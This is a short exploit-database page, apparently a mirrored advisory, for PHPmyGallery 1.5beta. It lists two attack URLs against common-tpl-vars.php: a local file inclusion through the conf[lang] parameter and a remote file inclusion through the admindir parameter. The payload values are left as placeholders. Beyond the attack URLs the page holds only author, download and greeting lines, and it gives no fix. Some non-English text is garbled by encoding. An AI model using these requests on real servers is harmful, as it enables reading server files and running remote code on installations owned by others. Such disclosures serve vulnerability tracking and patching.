[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPmyGallery 1.5beta (common-tpl-vars.php) LFI/RFI Vulnerabilities
# Published : 2008-12-09
# Author : CoBRa_21
# Previous Title : PostEcards (SQL/DD) Multiple Remote Vulnerabilities
# Next Title : PHP Multiple Newsletters 2.7 (LFI/XSS) Multiple Vulnerabilities
*****************************************************************************************
Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities
*****************************************************************************************
Script Name: Phpmygallery
Version: 1.5beta
Autor: CoBRa_21
My Site: www.ipbul.org
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
*****************************************************************************************
Exploit:
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LF?°] (Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]
*****************************************************************************************
Not: T??m ?°slam Aleminin Kurban Bayram?± Mobarek Olsun
*****************************************************************************************
# www.Syue.com [2008-12-09]